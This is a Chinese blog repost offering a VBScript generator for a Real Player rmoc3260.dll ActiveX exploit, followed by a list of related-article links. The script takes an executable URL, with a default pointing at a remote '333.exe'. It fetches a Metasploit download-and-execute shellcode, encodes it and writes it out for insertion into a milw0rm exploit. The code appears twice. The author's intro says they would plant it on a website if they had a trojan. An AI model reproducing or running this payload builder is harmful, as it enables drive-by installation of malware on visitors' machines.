Real Player rmoc3260.dll Exp
来源:互联网 发布:软件著作权登记流程 编辑:程序博客网 时间:2024/05/16 18:56
milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
一下来源:lcx
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
一下来源:lcx
'以下代码保存成vbs,双击即可
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(/$shellcode /=[/s/S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)/ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(/$shellcode /=[/s/S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)/ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso=Nothing
- Real Player rmoc3260.dll Exp
- Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)
- Ubuntu安裝Real Player
- Real Player播放器代码
- real player播放器参数和函数
- Install Real player 10 for Linux
- Windows Media Player & Real Player ActiveX 属性及方法
- Windows Media Player & Real Player ActiveX 属性及方法
- 让Real Player从你的电脑走开
- Real Player 网页播放器的参数及含义
- 让Real Player从你的电脑走开
- nbqxu.dll mshtmlsed.exe HelpIE.dll player.dll的清除
- .dll,.lib,.def 和 .exp文件
- .dll,.lib,.def 和 .exp文件
- .dll,.lib,.def 和 .exp文件
- .dll,.lib,.def 和 .exp文件
- dll中def和exp文件作用
- lib,dll,def,exp的信息
- 使用Visual Studio 2005编写纯C程序
- 精通CSS滤镜(四)
- 导入导出大量数据程序实现方法
- 《关于VisiBroker For Delphi的使用》(4)
- SQL Prompt--绝好的SQL语法提示工具
- Real Player rmoc3260.dll Exp
- 精通CSS滤镜(五)
- 浅谈怎样在MySQL中直接储存图片
- 自动编号的存储过程
- #pragma的作用
- _stdcall与_cdecl的区别与联系
- 发现CSS控件的好处
- 图解MySQL数据库的安装和操作
- 远程包含和本地包含漏洞的原理